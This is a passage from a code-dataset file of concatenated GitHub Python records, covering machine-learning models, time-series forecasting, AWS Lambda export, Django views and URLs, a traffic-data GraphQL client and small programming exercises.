將資料正規畫到0~1之間\r\nx_Train4D_nor=x_Train4D/255\r\nx_Test4D_nor=x_Test4D/255\r\n\r\n# 重新編碼ONEHOT\r\ny_Train_onehot=np_utils.to_categorical(y_Train)\r\ny_Test_onehot=np_utils.to_categorical(y_Test)\r\nprint(y_Train_onehot.shape)\r\n\r\n\r\n# # CNN model\r\nmodel = Sequential()\r\nmodel.add(Conv2D(filters=16,kernel_size=(5,5),padding='same',input_shape=(28,28,1),activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Conv2D(filters=36,kernel_size=(5,5),padding='same',activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(10,activation='softmax'))\r\nmodel.summary()\r\n\r\nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\r\ntrain_history=model.fit(x=x_Train4D_nor,y=y_Train_onehot,validation_split=0.2,epochs=2,batch_size=300,verbose=2)\r\npredictions = model.predict_classes(x_Test4D_nor)\r\nprint(len(predictions))\r\npd.crosstab(y_Test,predictions,rownames=['實際值'],colnames=['預測值'])\r\n","repo_name":"Raywang0211/CNN","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18095107103","text":"from statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom statsmodels.tsa.arima.model import ARIMA\nimport module.constants as const\nimport module.util_functions as utf\nimport datetime\nimport time\nimport numpy as np\nimport pandas as pd\n\nclass SARIMAX_Model:\n \n def __init__(self, p=0, q=0, P=0, Q=0, diff_order=0, transform='', model_type='SARIMA'):\n self.ar_order = p # set autoregressive order\n self.ma_order = q # set moving average order\n self.diff_order = diff_order # set difference order\n self.P = P # set AR order for seasonal component\n self.Q = Q # set MA order for seasonal component\n self.m = 52 # set number of time periods in a year\n self.model_type = model_type # model type: ARIMA or SARIMA\n self.transform_method = transform # set transformation method\n \n # set labels\n self.observe_label = const.STORE_OBSERVE # set observe label\n self.target = const.TARGET.get(transform) # set label for target variable based on transform method\n self.forecast_label = self.model_type + ' Forecast'\n self.forecast_train_label = self.model_type + ' Train'\n self.forecast_test_label = self.model_type + ' Test'\n \n # set model's name\n if model_type == 'SARIMA':\n self.model_name = model_type + '(' + str(p) + ', ' + str(diff_order) + ', ' + str(q) + ')(' + \\\n str(P) + ', 0,' + str(Q) + ')[' + str(self.m) + ']' \n else: # ARIMA model\n self.model_name = model_type + '(' + str(p) + ', ' + str(diff_order) + ', ' + str(q) + ')'\n \n def fit(self, X_train, Y_train):\n '''\n Train SARIMAX model and make in-sample forecasts.\n \n Parms:\n - X_train: SVD components\n - Y_train: train dataframe\n '''\n \n # record start time\n start = time.process_time()\n \n # duplicate original data\n data = Y_train.copy()\n\n if self.model_type == 'SARIMA': # SARIMA + SVD components\n model = SARIMAX(data[self.target], exog=X_train,\n order=(self.ar_order, self.diff_order, self.ma_order),\n seasonal_order=(self.P, 0, self.Q, self.m),\n simple_differencing=False).fit(disp=False)\n else: # ARIMA + SVD components\n model = ARIMA(data[self.target], exog=X_train, \n order=(self.ar_order, self.diff_order, self.ma_order)).fit()\n \n # make in-sample forecast and compute forecast error\n 
data[self.forecast_train_label] = utf.inverse_transform(model.fittedvalues, self.transform_method)\n data[const.ERROR_LABEL] = data[self.observe_label] - data[self.forecast_train_label]\n \n # check if residuals are correlated\n self.residual_info = utf.check_residuals(data)\n \n # save data and model\n self.data = data\n self.model = model\n \n # record end time\n end = time.process_time()\n self.train_time = (end - start) * 10**3 # compute model's training time in milli-second\n \n def predict(self, X, n_periods=52, forecast_label=None):\n '''\n Forecast sales for next n periods.\n \n Parms:\n - X: SVD components\n - n_periods: number of future periods for making sales forecast\n - forecast_label: label for a variable that contains forecast values\n '''\n \n forecast_label = self.forecast_test_label if forecast_label == None else forecast_label # set forecast label\n future_dates = utf.get_future_dates(self.data.Date.iloc[-1], n_periods) # get dates for next n periods\n \n # make out-of-sample forecast\n forecast = self.model.get_prediction(start=self.data.shape[0], end=self.data.shape[0]+n_periods-1, exog=X) \n yhat = utf.inverse_transform(forecast.predicted_mean, self.transform_method)\n \n # get confidence intervals\n yhat_conf_int = forecast.conf_int(alpha=0.05)\n lower = utf.inverse_transform(yhat_conf_int['lower ' + self.target].values, self.transform_method)\n upper = utf.inverse_transform(yhat_conf_int['upper ' + self.target].values, self.transform_method)\n\n # create and return forecast data frame\n return pd.DataFrame({'Date': future_dates, forecast_label: yhat, 'Lower Bound': lower, 'Upper Bound': upper})","repo_name":"nphan20181/sales-forecast","sub_path":"module/sarima_model.py","file_name":"sarima_model.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34475784032","text":"import json\r\nimport boto3\r\nimport os\r\nimport sys\r\nimport pandas as pd\r\nfrom boto3.dynamodb.conditions import Key\r\n\r\n\r\n\r\ndef lambda_handler(event, context):\r\n\r\n year = event[\"year\"]\r\n start_date = event[\"start_date\"]\r\n end_date = event[\"end_date\"]\r\n \r\n table_name = 'weather_data'\r\n client = boto3.resource('dynamodb')\r\n table = client.Table(table_name)\r\n\r\n response = table.query(\r\n KeyConditionExpression=Key('year').eq(year)&Key('date').between(start_date, end_date)\r\n )\r\n items = response['Items']\r\n item_list = []\r\n for item in items:\r\n item_list.append(item)\r\n df = pd.DataFrame(item_list)\r\n local_file = '/tmp/climate_data_selected_result.xlsx'\r\n df.to_excel(local_file)\r\n s3 = boto3.client('s3')\r\n bucket_name = 'my-bucket-name'\r\n s3_file = 'climate_data_selected_result.xlsx'\r\n s3.upload_file(local_file, bucket_name, s3_file)","repo_name":"ericzheng050701/wcd_de_lab","sub_path":"NoSQL_DynamoDB/scripts/Lambda2_Dynamo2S3.py","file_name":"Lambda2_Dynamo2S3.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73138174593","text":"import os\nimport random\nimport threading\nimport time\nimport cv2\n\nfrom state_fusion.msg_sockets import socket_sender\nfrom datetime import datetime\n\ndef now_string():\n now=datetime.now()\n return now.strftime('%Y_%b_%d__%H:%M')\n\ndef cicle_list(l):\n \"\"\"\n Function that return the next element in list. 
At the end it returns the first element and then repeats\n    :param l:\n    :return:\n    \"\"\"\n    ind=0\n    n=len(l)\n    def temp():\n        nonlocal ind\n        val = l[ind]\n        ind = (ind+1)%n\n        return val\n    return temp\n\n\ndef open_img(folder,path):\n    format_name = lambda x: x.split('.')[0]\n    path_full = os.path.join(folder,path)\n    out = cv2.imread(path_full,cv2.IMREAD_COLOR)\n    return format_name(path),out\n\n\ndef random_img_from_folder(folder_path):\n    lt = os.listdir(folder_path)\n    random.shuffle(lt)\n    fun_iter_folder = cicle_list(list(lt))\n    feed_function = lambda: open_img(folder_path, fun_iter_folder())\n    return feed_function\n\ndef video_feed_realtime(video_path,frame_start=0):\n\n    cap = None\n    st=time.time()\n    fps=40\n    def retrieve_frame():\n        nonlocal cap\n        if cap is None:\n            cap = cv2.VideoCapture(video_path)\n            if frame_start != 0:\n                cap.set(cv2.CAP_PROP_POS_FRAMES, frame_start)\n\n        now = frame_start+(time.time()-st)*fps\n        success_set = cap.set(cv2.CAP_PROP_POS_FRAMES, int(now))\n        success_grab = cap.grab()\n        if success_set and success_grab:\n            flag, frame = cap.retrieve()\n            cf = cap.get(cv2.CAP_PROP_POS_FRAMES)\n            out_name = '{0}_-1'.format(cf)\n            return out_name,frame\n\n        else:\n            return None,None\n\n\n    return retrieve_frame\n\ndef video_feed(video_path,frame_start=0):\n\n    cap = None\n\n    def retrieve_frame():\n        nonlocal cap\n        if cap is None:\n            cap = cv2.VideoCapture(video_path)\n            if frame_start != 0:\n                cap.set(cv2.CAP_PROP_POS_FRAMES, frame_start)\n\n        success = cap.grab()\n\n        if success:\n            flag, frame = cap.retrieve()\n            cf = cap.get(cv2.CAP_PROP_POS_FRAMES)\n            out_name = '{0}_-1'.format(cf)\n            return out_name,frame\n\n        else:\n            return None,None\n\n\n    return retrieve_frame\n\n\ndef calc_port():\n    \"\"\"\n    Calc a port for each thread (for remote debugging)\n    :return:\n    \"\"\"\n    id_th = threading.get_ident()\n    return 8000+id_th%100\n\n\ndef do_send_loop(server_address, feature_instance, n_msgs=1000, raise_excp=False,sleep_time=-1):\n    print('INIT SENDER')\n\n    def loop_send():\n        with socket_sender(server_address,verbose=False) as send_fun:\n            if n_msgs == -1:\n                while True:\n                    try:\n                        if sleep_time != -1:\n                            time.sleep(sleep_time)\n                        out_dict = feature_instance.process()\n                        send_fun(out_dict)\n                    except Exception as e:\n                        print('EXCEPTION {0}'.format(e))\n                        if raise_excp:\n                            raise e\n            else:\n                for i in range(n_msgs):\n                    try:\n                        if sleep_time != -1:\n                            time.sleep(sleep_time)\n                        out_dict = feature_instance.process()\n                        send_fun(out_dict)\n                    except Exception as e:\n                        print('EXCEPTION {0}'.format(e))\n                        if raise_excp:\n                            raise e\n            print('EXITING SENDER')\n            send_fun({'END':True}) # END signal\n\n    if feature_instance.use_context:\n        with feature_instance.model_context():\n            loop_send()\n    else:\n        loop_send()\n\n    print('END SENDER')\n    return\n\n\ntry:\n    from line_profiler import LineProfiler\n\n    def do_profile(follow=[]):\n        def inner(func):\n            def profiled_func(*args, **kwargs):\n                try:\n                    profiler = LineProfiler()\n                    profiler.add_function(func)\n                    for f in follow:\n                        profiler.add_function(f)\n                    profiler.enable_by_count()\n                    return func(*args, **kwargs)\n                finally:\n                    profiler.print_stats()\n            return profiled_func\n        return inner\n\nexcept ImportError:\n    def do_profile(follow=[]):\n        \"Helpful if you accidentally leave in production!\"\n        def inner(func):\n            def nothing(*args, **kwargs):\n                return func(*args, **kwargs)\n            return nothing\n        return 
inner\n","repo_name":"aferral/gungeon_bot","sub_path":"state_fusion/deploy_utils.py","file_name":"deploy_utils.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"26955334958","text":"from django.core.management.base import BaseCommand\n\nfrom joboffers.models import JobOffer\n\n\nclass TestPublishCommand(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"--offer-id\", type=int, required=False)\n\n def _handle_publish(self, options, publisher_class):\n \"\"\"Command handler for any publisher.\"\"\"\n offer_id = options.get('offer_id')\n status = None\n raw_status = None\n publisher = publisher_class()\n\n if offer_id is not None:\n job_offer = JobOffer.objects.get(id=offer_id)\n self.stdout.write(self.style.SUCCESS(f'Publicando oferta #{offer_id}.'))\n status = publisher.publish(job_offer)\n else:\n self.stdout.write(self.style.SUCCESS('Publicando una prueba.'))\n raw_status = publisher._push_to_api(\n 'Esto es una prueba de post.\\nhttps://github.com/PyAr/pyarweb',\n 'Título de prueba',\n 'https://github.com/PyAr/pyarweb'\n )\n\n if raw_status == 200 or status == publisher.RESULT_OK:\n self.stdout.write(\n self.style.SUCCESS(\n f'Oferta publicada con éxito en: {publisher.name}.'\n )\n )\n else:\n self.stderr.write(\n self.style.ERROR(\n f'Hubo un error al querer publicar la oferta en: {publisher.name}.'\n )\n )\n","repo_name":"PyAr/pyarweb","sub_path":"joboffers/management/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"61"} +{"seq_id":"42344566588","text":"# https://adventofcode.com/2020/day/5\n\nfrom day import Day\nimport re\n\n\nclass Day5(Day):\n def __init__(self, file_name: str):\n super().__init__(5, file_name)\n self.pattern = re.compile(r'^([FB]{7})([RL]{3})$')\n\n def part_1(self):\n answer = -999999999\n for line in self.input_data:\n match = self.pattern.match(line)\n if match:\n seat_id = (self.parse_row(match.group(1)) * 8 +\n self.parse_col(match.group(2)))\n answer = max(answer, seat_id)\n return answer\n\n def part_2(self):\n answer = None\n seats = []\n for line in self.input_data:\n match = self.pattern.match(line)\n if match:\n row = self.parse_row(match.group(1))\n col = self.parse_col(match.group(2))\n seat_id = (row * 8 + col)\n seats.append(seat_id)\n # we have all the seats (other than our own) so order them\n seats.sort()\n # now our seat will be between the two seats with a gap of 2\n for i, seat in enumerate(seats):\n if i == len(seats) - 1:\n break\n if seats[i + 1] - seat == 2:\n answer = seat + 1\n return answer\n\n # these row/cols are just other ways of representing binary\n def parse_row(self, string: str):\n return int(string.replace('B', '1').replace('F', '0'), 2)\n\n def parse_col(self, string: str):\n return int(string.replace('R', '1').replace('L', '0'), 2)\n","repo_name":"akakalz/advent_of_code_2020","sub_path":"src/day_05/day_05.py","file_name":"day_05.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42620587489","text":"list=[]\nlist1=[]\nn=int(input())\nfor i in range(n):\n \n \n \n name=input()\n marks=input()\n list1.append([name,float(marks)])\n list.append(float(marks))\nlist=set(list)\nA=min(list)\nlist.remove(A)\nvalue=min(list)\nlist1.sort()\nfor j in range(len(list1)):\n 
if(value==list1[j][1]):\n print(list1[j][0])\n \n\n","repo_name":"bhaskarkalahasthi/pythonprograms","sub_path":"nested list conceopt program.py","file_name":"nested list conceopt program.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30834769505","text":"def finder(files, queries):\n my_hash = {}\n result = []\n for query in queries:\n my_hash[query] = True\n \n for file_ in files:\n current = file_.replace('/', \" \").split()\n if current[-1] in my_hash:\n result.append(file_)\n \n\n return result\n\n\nif __name__ == \"__main__\":\n files = [\n '/bin/foo',\n '/bin/bar',\n '/usr/bin/baz'\n ]\n queries = [\n \"foo\",\n \"qux\",\n \"baz\"\n ]\n print(finder(files, queries))\n","repo_name":"prietopedro/Python-Training","sub_path":"Lambda School Daily Projects/04 - HashTables and Blockchain/03 - Sprint HashTables Problems/hashtables/ex5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74355844353","text":"from django.conf.urls import include, url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom frame import utils\nfrom hstool import views, public\n\n\nadmin.autodiscover()\n\ndoc_type_urls = [\n url(r'^list/$', views.DriverTypeView.as_view(), name='list'),\n url(r'^add/$', views.DriverTypeAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.DriverTypeUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.DriverTypeDelete.as_view(),\n name='delete'),\n]\n\nsteep_category_urls = [\n url(r'^list/$', views.SteepCategoryView.as_view(), name='list'),\n url(r'^add/$', views.SteepCategoryAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.SteepCategoryUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.SteepCategoryDelete.as_view(),\n name='delete'),\n]\n\nimpact_type_urls = [\n url(r'^list/$', views.ImpactTypeView.as_view(), name='list'),\n url(r'^add/$', views.ImpactTypeAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.ImpactTypeUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.ImpactTypeDelete.as_view(),\n name='delete'),\n]\n\ntime_horizon_urls = [\n url(r'^list/$', views.TimeHorizonView.as_view(), name='list'),\n url(r'^add/$', views.TimeHorizonAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.TimeHorizonUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.TimeHorizonDelete.as_view(),\n name='delete'),\n]\n\nmetadata_urls = [\n url(r'^steep_category/', include(steep_category_urls,\n namespace='steep_category')),\n url(r'^doc_type/', include(doc_type_urls, namespace='doc_type')),\n url(r'^impact_type/', include(impact_type_urls, namespace='impact_type')),\n url(r'^time_horizon/', include(time_horizon_urls,\n namespace='time_horizon')),\n]\n\nsettings_urls = [\n url(r'^geographic_scopes/required/$',\n views.GeoScopesRequired.as_view(), name='geo_scopes_required'),\n url(r'^roles/$', views.RolesOverview.as_view(), name='roles'),\n url(r'^metadata/', include(metadata_urls, namespace='metadata')),\n]\n\nsources_urls = [\n url(r'^list/$', views.SourcesList.as_view(), name='list'),\n url(r'^add/$', views.SourcesAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.SourcesUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.SourcesDelete.as_view(), 
name='delete'),\n]\n\ndrivers_urls = [\n url(r'^list/$', views.DriversList.as_view(), name='list'),\n url(r'^add/$', views.DriversAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.DriversUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.DriversDelete.as_view(), name='delete'),\n]\n\nindicators_urls = [\n url(r'^list/$', views.IndicatorsList.as_view(), name='list'),\n url(r'^add/$', views.IndicatorsAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.IndicatorsUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.IndicatorsDelete.as_view(),\n name='delete'),\n]\n\nimplications_urls = [\n url(r'^list/$', views.ImplicationsList.as_view(), name='list'),\n url(r'^add/$', views.ImplicationsAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.ImplicationsUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.ImplicationsDelete.as_view(),\n name='delete'),\n]\n\nfigures_urls = [\n url(r'^list/$', views.FiguresList.as_view(), name='list'),\n url(r'^add/$', views.FiguresAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.FiguresUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.FiguresDelete.as_view(), name='delete'),\n]\n\nimpacts_urls = [\n url(r'^list/$', views.ImpactsList.as_view(), name='list'),\n url(r'^add/$', views.ImpactsAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.ImpactsUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.ImpactsDelete.as_view(), name='delete'),\n]\n\nassessments_urls = [\n url(r'^list/$', views.AssessmentsList.as_view(), name='list'),\n url(r'^add/$', views.AssessmentsAdd.as_view(), name='add'),\n url(r'^detail/(?P\\d+)/$', views.AssessmentsDetail.as_view(),\n name='detail'),\n url(r'^detail/(?P\\d+)/relations$', views.assessments_relations,\n name='relations'),\n url(r'^update/(?P\\d+)/$', views.AssessmentsUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.AssessmentsDelete.as_view(),\n name='delete'),\n]\n\nrelations_urls = [\n url(r'add/$', views.RelationsAdd.as_view(), name='add'),\n url(r'update/(?P\\d+)/$', views.RelationsUpdate.as_view(),\n name='update'),\n url(r'delete/(?P\\d+)/$', views.RelationsDelete.as_view(), name='delete')\n]\n\nmodals_urls = [\n url(r'^detail/(?P\\d+)/(?P\\w+)/(?P\\d+)/$',\n views.ViewModal.as_view(), name='relations_detail'),\n url(r'^add/indicators/$', views.AddIndicatorsModal.as_view(), name='add'),\n url(r'^add/(?P\\w+)/$', views.AddModal.as_view(), name='add'),\n url(r'^add/success/(?P\\w+)/(?P\\d+)$',\n views.AddModalSuccess.as_view(),\n name='add_success'),\n url(r'^view/figure/(?P\\d+)/$', views.ViewFigureModal.as_view(),\n name='view_figure'),\n]\n\nentries_urls = [\n url(r'$', views.UserEntriesView.as_view(), name='list'),\n url(r'^delete/(?P\\d+)/$', views.UserEntriesDelete.as_view(),\n name='delete'),\n]\n\npublic_urls = [\n url(r'^drivers-change', public.DocList.as_view(), name='doc_list'),\n]\n\nurlpatterns = [\n url(r'^$', views.HomeView.as_view(), name='home_view'),\n url(r'^assessments/', include(assessments_urls, namespace='assessments')),\n url(r'^settings/', include(settings_urls, namespace='settings')),\n url(r'^assessments/(?P\\d+)/relations/',\n include(relations_urls, namespace='relations')),\n url(r'^sources/', include(sources_urls, namespace='sources')),\n url(r'^docs/', include(drivers_urls, namespace='drivers')),\n url(r'^implications/', include(implications_urls,\n namespace='implications')),\n url(r'^indicators/', include(indicators_urls, 
namespace='indicators')),\n url(r'^figures/', include(figures_urls, namespace='figures')),\n url(r'^impacts/', include(impacts_urls, namespace='impacts')),\n url(r'^modals/', include(modals_urls, namespace='modals')),\n url(r'^_lastseencount/$', utils.get_objects_from_last_seen_count),\n url(r'^entries/', include(entries_urls, namespace='entries')),\n url(r'^public/', include(public_urls, namespace='public')),\n url(r'^admin/', include(admin.site.urls)),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"eea/flis.horizon-scanning-tool","sub_path":"hstool/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40469480630","text":"\"\"\"\nGiven a binary tree, return the postorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n 1\n \\\n 2\n /\n 3\nreturn [3,2,1].\n\nNote: Recursive solution is trivial, could you do it iteratively?\n\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def postorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n ans = []\n self.postorderHelper(root, ans)\n return ans\n \n def postorderHelper(self, root, ans):\n if not root:\n return\n self.postorderHelper(root.left, ans)\n self.postorderHelper(root.right, ans)\n ans.append(root.val)\n \nclass Solution2(object): # non recursion\n def postorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n ans = []\n stack = [(root, False)]\n while stack:\n popEle, isVisited = stack.pop()\n if popEle is None:\n continue\n \n if isVisited == True:\n ans.append(popEle.val)\n else:\n stack.append((popEle, True))\n stack.append((popEle.right, False))\n stack.append((popEle.left, False))\n return ans\n","repo_name":"akb46mayu/Data-Structures-and-Algorithms","sub_path":"BinaryTree and Divide and Conquer/le145_binaryTreePostorderTraversal.py","file_name":"le145_binaryTreePostorderTraversal.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74996667073","text":"# Создать страницу, на которой будет форма для ввода текста и\n# кнопка \"Отправить\"\n# При нажатии кнопки будет произведен подсчет количества слов\n# в тексте и переход на страницу с результатом.\n# files: form4.html, result_4.html\n\nfrom flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n text = request.form['text']\n len_text = len(text)\n return redirect(url_for('result', count=len_text))\n return render_template('form_4.html')\n\n\n@app.route('/result/')\ndef result(count):\n return render_template('result_4.html', count=count)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"zaryushka/flask_fastapi_hw2","sub_path":"task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12192555772","text":"#import tensorflow as tf\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as 
sns\nimport glob, os\nfrom datetime import datetime, timedelta\nimport datetime\nimport pandas as pd\nfrom gql.transport.requests import RequestsHTTPTransport\nfrom gql import gql, Client\nimport json\nimport requests\nimport pytz\n\n\n\n\nMODEL_TYPE = \"rnn_updated\"\nLOG_DIR = f\"../EiT/tmp/logs/{MODEL_TYPE}\"\nLOG_LEVEL = \"ERROR\"\nTARGET_PATH = \"../EiT/final_datasets\"\n\nmodel_24h_path_local = \"../EiT/tmp/models/rnn_updated/rnn_updated_20210303_162009/model\"\n\n#model_24h = tf.keras.models.load_model(f\"{model_24h_path_local}/saved_model\")\n\n\nparams = {\n 'input_sequence_len': 48,\n 'output_sequence_len': 24,\n}\n\n\n\"\"\"\n Returns the live data, i.e. downloads last 48h of data from the various providers and returns it\n Returns: \n dates : pd.DataFrame.index.values -> The dates of the input data\n data : pd.DataFrame.values.astype('float32') -> The input data that is given to the model\n labels : pd.DataFrame.values.astype('float32') -> The labels of the input data given to the model\n\"\"\"\ndef get_live_data():\n pass\n\n\"\"\"\n Performs prediction on the given data\n Assumes data is on the same format as the data returned from \"get_live_data\"\n Returns:\n pred_dates : pd.DataFrame.index.values -> The dates of the prediction interval (24h)\n model_labels : pd.DataFrame.values.astype('float32') -> The predicted values of the model\n baseline_labels : pd.DataFrame.values.astype('float32') -> The predicted values of the baseline\n\"\"\"\ndef perform_prediction(dates, data, labels):\n pass\n\n\ndef get_PRA_data(start, stop, station):\n #print(\"In get_PRA_data\")\n\n sample_transport = RequestsHTTPTransport(\n url='https://www.vegvesen.no/trafikkdata/api/',\n use_json=True,\n headers={\n \"Content-type\": \"application/json\",\n },\n verify=False,\n retries=3\n )\n\n client = Client(\n transport=sample_transport,\n # fetch_schema_from_transport=True,\n )\n\n heading = '''\n trafficData(trafficRegistrationPointId: \"%s\") {\n trafficRegistrationPoint {\n name\n id\n latestData {\n volumeByHour\n }\n trafficRegistrationType\n manualLabels {\n affectedLanes {\n lane {\n laneNumber\n }\n }\n validFrom\n validTo\n }\n commissions {\n validFrom\n validTo\n lanes {\n laneNumber\n }\n }\n direction {\n to\n from\n }\n location {\n coordinates {\n latLon {\n lat\n lon\n }\n }\n }\n }\n ''' % (station)\n\n after = \"\"\n next = True\n response = \"\"\n first = True\n\n while next:\n query_string = '''\n {\n %s\n volume {\n byHour(%sfrom: \"%s\", to: \"%s\") {\n pageInfo {\n hasNextPage\n endCursor\n }\n edges {\n node {\n from\n to\n byDirection {\n heading\n total {\n coverage {\n percentage\n unit\n unavailable {\n numerator\n denominator\n percentage\n }\n uncertain {\n numerator\n denominator\n percentage\n }\n included {\n numerator\n denominator\n percentage\n }\n }\n }\n byLengthRange {\n lengthRange {\n lowerBound\n upperBound\n }\n total {\n volumeNumbers {\n volume\n validSpeed {\n total\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n ''' % (heading, after, start, stop)\n #print (f\"Query string is: {query_string}\")\n query = gql(query_string)\n\n this_response = client.execute(query)\n #print(\"this_response is: \" + json.dumps(this_response))\n # Let us first of all do some checking on the response to determine if we have data\n try:\n x = this_response['trafficData']['volume']['byHour']['edges']\n except KeyError:\n # No edges means no data, just return empty response\n #print(\"No edges in this_response\")\n return \"\"\n if not x:\n # edges list exist but list is empty 
also means no data, just return empty response\n #print(\"edges exists in this_response but edge list is empty\")\n return \"\"\n\n #print (f\"this_response type is: {type(this_response)}\")\n #print(\"this_response is: \" + json.dumps(this_response))\n if first:\n #print(\"This is the first response...\")\n this_response_str = json.dumps(this_response)\n response = response + this_response_str[:this_response_str.rindex(\"]\")] + \",\"\n first = False\n else:\n #print(\"This is a subsequent response...\")\n this_response_str = json.dumps(this_response[\"trafficData\"][\"volume\"][\"byHour\"][\"edges\"])\n this_response_str = this_response_str[this_response_str.index(\"[\")+1:]\n response = response + this_response_str[:this_response_str.rindex(\"]\")] + \",\"\n\n # Check this_response to see if there are more pages and if yes, set after to endCursor\n if this_response[\"trafficData\"][\"volume\"][\"byHour\"][\"pageInfo\"][\"hasNextPage\"] == True:\n #print(\"Next is True\")\n endCursor = this_response[\"trafficData\"][\"volume\"][\"byHour\"][\"pageInfo\"][\"endCursor\"]\n after = '''after: \"%s\", ''' % (endCursor)\n heading = '''trafficData(trafficRegistrationPointId: \"%s\") {''' % (station)\n else:\n #print(\"Next is False\")\n next = False\n\n #print(\"Clean up the response...\")\n # remove last comma\n response = response[:response.rindex(\",\")]\n # Add closing brackets\n response = response + \"]}}}}\"\n #print(\"Return the response...\")\n return response\n\noslo_tz = pytz.timezone('Europe/Oslo')\ndatetime_stop = datetime.datetime.now().replace(tzinfo=pytz.utc).astimezone(oslo_tz).replace(minute=0, second=0, microsecond=0)\n\nmet_elements = \"air_temperature,surface_air_pressure,wind_speed,wind_from_direction,relative_humidity,specific_humidity,road_water_film_thickness,sum(duration_of_precipitation PT1H),sum(precipitation_amount PT1H),cloud_area_fraction,surface_snow_thickness,sea_surface_temperature,volume_fraction_of_water_in_soil\"\n\nhours = 1\ndatetime_stop = datetime_stop - timedelta(hours=2)\ndatetime_start = datetime_stop - timedelta(hours=hours)\n\ndatetime_stop = datetime_stop + timedelta(hours=1) # To include last hour (PRA does not include last)\nstop = datetime_stop.isoformat()\nstart = datetime_start.isoformat()\n\ndata = get_PRA_data(start, stop, None)\nprint(data)\n","repo_name":"christianbv/EiT","sub_path":"live_prediction.py","file_name":"live_prediction.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72335408194","text":"# coding:utf-8\r\nimport requests\r\nfrom Response import Response\r\nimport logging\r\n\r\nclass NetworkService(object):\r\n\t#取自chrome的一次访问\r\n\tDEFAULT_HEADER = {\r\n\t\t'Connection': 'keep-alive',\r\n\t\t'Pragma': 'no-cache',\r\n\t\t'Cache-Control': 'no-cache',\r\n\t\t'Upgrade-Insecure-Requests': '1',\r\n\t\t'User-Agent': 